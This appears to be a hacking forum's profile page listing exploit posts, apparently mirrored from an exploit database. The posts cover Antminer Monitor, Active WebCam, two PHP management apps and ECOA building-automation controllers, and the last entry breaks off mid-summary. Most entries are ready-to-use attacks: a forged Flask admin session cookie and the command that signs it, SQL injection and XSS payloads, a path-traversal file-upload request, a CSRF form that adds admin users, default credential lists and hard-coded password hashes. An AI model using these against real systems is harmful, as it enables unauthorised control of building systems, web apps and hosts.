Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Antminer Monitor 0.5.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Antminer Monitor 0.5.0 - Authentication Bypass # Date: 09/06/2021 # Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 # Exploit Author: CQR.company / Vulnz. # Vendor Homepage: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor # Software Link: https://github.com/anselal/antminer-monitor, https://soulis.tech/ # Version: 0.5.0 # Tested on: Windows, Linux, Macos Software is commonly used for Monitoring antminers and could easily be found in zoomeye ( 800), shodan ( 500). For now this is the most popular antminer monitoring tool. Vulnerability in Antminer Monitor exists because of backdoor or misconfiguration done by developer inside settings file in flask server. Settings file has a predefined secret string, which would be randomly generated, however it is static in this build.antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub <https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py> Secret key is 'super secret key'. Based on this information we can craft authorization bypass cookies. Using software flask-unsing we can generate cookie which will provide you admin access. flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key" Additionally you can use this universal cookie to access web interface of flask application. This cookie can work on all systems in "session" field. .eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU In addition DEBUG = True which means /console works, however it needs pin.
  2. HireHackking

    Active WebCam 11.5 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Active WebCam 11.5 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 09.09.2021 # Software Link: https://www.techspot.com/downloads/175-active-webcam.html # Vendor Homepage: https://www.pysoft.com/ # Version: 11.5 # Tested on: Windows 10 # Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options # Proof of Concept: C:\Users\death>sc qc ACTIVEWEBCAM [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ACTIVEWEBCAM TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Active WebCam DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Active WebCam ACTIVEWEBCAM C:\Program Files\Active WebCam\WebCam.exe Auto
  3. HireHackking

    Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS) # Date: 2021-09-08 # Exploit Author: Emre Aslan # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 11 - XAMPP Server # Vulnerable page: host/admin/* # Vulnerable Code: <div class="user-info"><div><strong>Admin[PAYLOAD]</strong></div> # Vulnerable Parameter: adminname[ POST Data ] # Tested Payload: <svg/onload=alert('XSS')> # Proof Of Concept: # 1 - Login the dashboard # 2 - Go to /admin/admin-profile.php # 3 - set admin name with payload # 4 - xss fires
  4. HireHackking

    ECOA Building Automation System - Path Traversal Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Path Traversal Arbitrary File Upload # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Path Traversal Arbitrary File Upload Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from an arbitrary file write and directory traversal vulnerability. Using the POST parameters 'rbt' and 'filename', attackers can set arbitrary values for location and content type and gain the possibility to execute arbitrary code on the affected device. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5669 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5669.php 25.06.2021 -- Directory Traversal / File Path Traversal / Unrestricted File Upload -------------------------------------------------------------------- - Abusing the 'filename' and 'rbt' POST parameter, attacker can navigate outside current directory and write files in arbitrary location. - There is no validation on file content, file extension and file location. Request: POST /ebd-bin/upload HTTP/1.1 Host: 192.168.1.3:8080 ------WebKitFormBoundaryvxy2zFDs1Z69pfRB Content-Disposition: form-data; name="rbt" ecsfile ------WebKitFormBoundaryvxy2zFDs1Z69pfRB Content-Disposition: form-data; name="filename"; filename="../../../anyfile.ext" Content-Type: application/octet-stream ANY_CONTENT_HERE ------WebKitFormBoundaryvxy2zFDs1Z69pfRB--
  5. HireHackking

    ECOA Building Automation System - Weak Default Credentials

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Weak Default Credentials # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Weak Default Credentials Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller uses weak set of default administrative credentials that can be easily guessed in remote password attacks and gain full control of the system. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5668 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5668.php 25.06.2021 -- Default / Weak Credentials -------------------------- - Attacker can use default credentials and authenticate to the SmartHome, Building Automation and Access Control System. Credentials: guest:guest user:user admin:admin root:embed embed:power administrator:empty humex:humex4377 ecoa:ecoa4377
  6. HireHackking

    Men Salon Management System 1.0 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities # Date: 2021-09-09 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql # Version: 1.0 # Tested on: Windows 10 - XAMPP Server # Vulnerable page : http://localhost/msms/admin/edit-customer-detailed.php?editid= # Proof Of Concept : # 1 . Download And install [ Men Salon Management System ] # 2 . Go to /msms/admin/index.php and Enter Username & Password # 3 . Navigate to >> Customer List # 4 . In the action column, click Edit # 5 . Enter the payload into the Url and Fields # [ Sql Injection ] : Vulnerable paramater : The editid paramater is Vulnerable to sqli GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+ # [ Stored Cross-Site Scripting ] : Vulnerable Fields : Name & Email Payload Used: "><script>alert(document.cookie)</script>
  7. HireHackking

    ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF) # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Cross-Site Request Forgery Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The Building Automation System / SmartHome allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform any CRUD operation like user creation, alarm shutdown and account password change with administrative privileges if a logged-in user visits a malicious web site. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5671 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5671.php 25.06.2021 -- Cross-Site Request Forgery (CSRF) - Add / Modify Users or Disarm Alarm ---------------------------------------------------------------------- - CSRF exist in entire solution for any CRUD operation. PoC: <html> <body> <form action="http://192.168.1.3:8080/usersave" method="POST"> <input type="hidden" name="bk" value="&#45;1" /> <input type="hidden" name="edtText" value="" /> <input type="hidden" name="comText" value="19" /> <input type="hidden" name="delrow" value="" /> <input type="hidden" name="hiddenText" value="user&#1;user&#1;19&#1;&#1;&#2;guest&#1;guest&#1;10&#1;&#1;&#2;root&#1;embed&#1;19&#1;&#1;&#2;admin&#1;admin&#1;19&#1;&#1;&#2;" /> <input type="submit" value="Submit" /> </form> </body> </html>
  8. HireHackking

    ECOA Building Automation System - Directory Traversal Content Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Directory Traversal Content Disclosure # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Directory Traversal Content Disclosure Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter 'cpath' in File Manager (fmangersub), attackers can disclose directory content on the affected device. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5670 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php 25.06.2021 -- Directory Traversal Content Disclosure -------------------------------------- - Abysing the 'cpath' GET parameter, attackers can disclose directory contents by directory traversal attacks. - cpath=. - cpath=../../../../../../../etc Request: GET /fmangersub?cpath=/ HTTP/1.1 Host: 192.168.1.3:8080 bacevent.elf redown.elf system.bin webnewc.elf err.txt hole.elf modbustcp.elf ianplc.bin hitachi.el bacser.elf root.pem pwsd.bin server.lst symtbl.tbl client.pem gb-unicode.bin httpser.elf namelst.bin AI.tbl BI.tbl AV.tbl BV.tbl mstplalf rthost.elf big5-unicode.bin version.bin modbus.elf rbdev.bin rbdlc.elf powercrd.elf
  9. HireHackking

    ECOA Building Automation System - Hard-coded Credentials SSH Access

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Hard-coded Credentials SSH Access # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Hard-coded Credentials SSH Access Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller is vulnerable to hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the device. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5675 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5675.php 25.06.2021 -- Hard-coded Credentials / Remote SSH Access ------------------------------------------ - Exercise for the nation-state actors and actresses. root:$1$ILT0V4Sf$AR4nYzAFri3Cqi2BwFD/h.:16183:0:99999:7::: user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7::: webs:$1$ZP8rifJj$8Nq6pvZfZleSOM1NxQAck0::::::: admin:$1$7BGOwUYp$dgzOcdE9eXPmxZ0PomIOR0::::::: ecoa:$1$Ux/uar1o$RlMzoY0I7KEMkmNzDqzFz1:-5835:0:99999:7::: humex:$1$1v5rveDi$bXRhL1q20wpYM5vo3aZ050:-5877:0:99999:7::: guest:$1$Zb9DELKT$IK8/EnLI8o0G36kjjBjWj1:6845:0:99999:7:::
  10. HireHackking

    ECOA Building Automation System - Configuration Download Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Configuration Download Information Disclosure # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Configuration Download Information Disclosure Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 